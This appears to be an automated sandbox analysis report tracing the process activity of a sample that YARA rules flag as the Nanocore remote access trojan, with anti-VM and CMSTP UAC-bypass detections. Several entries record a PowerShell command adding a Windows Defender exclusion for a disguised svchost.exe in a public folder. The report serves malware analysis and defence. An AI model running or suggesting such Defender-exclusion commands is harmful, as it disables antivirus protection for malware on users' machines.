                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:46
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 2576
                                                                                              Imagebase:0x960000
                                                                                              File size:434592 bytes
                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:27:46
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:27:46
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:47
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:47
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:27:48
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:48
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:27:49
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:51
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Users\Public\Documents\???????????????\svchost.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\Public\Documents\???????????????\svchost.exe'
                                                                                              Imagebase:0xac0000
                                                                                              File size:31232 bytes
                                                                                              MD5 hash:B462382CB954466386F9334247E0A34C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001B.00000000.392538687.00000000067F0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000000.392538687.00000000067F0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001B.00000000.390697273.0000000004F84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000000.390697273.0000000004F84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001B.00000000.376186013.0000000004F84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000000.376186013.0000000004F84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                              General

                                                                                              Start time:20:27:55
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4956 -ip 4956
                                                                                              Imagebase:0x960000
                                                                                              File size:434592 bytes
                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:27:57
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:28:05
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:28:05
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:28:05
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:28:05
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 2184
                                                                                              Imagebase:0x960000
                                                                                              File size:434592 bytes
                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:28:06
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:28:06
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                                                                                              Imagebase:0x11b0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:28:06
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:28:15
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6728 -ip 6728
                                                                                              Imagebase:0x960000
                                                                                              File size:434592 bytes
                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:28:25
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 2600
                                                                                              Imagebase:0x960000
                                                                                              File size:434592 bytes
                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Start time:20:28:26
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:29:03
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                              Imagebase:0x7ff69d880000
                                                                                              File size:455656 bytes
                                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:29:03
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:29:03
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:20:29:21
                                                                                              Start date:27/09/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                              Imagebase:0x7ff797770000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >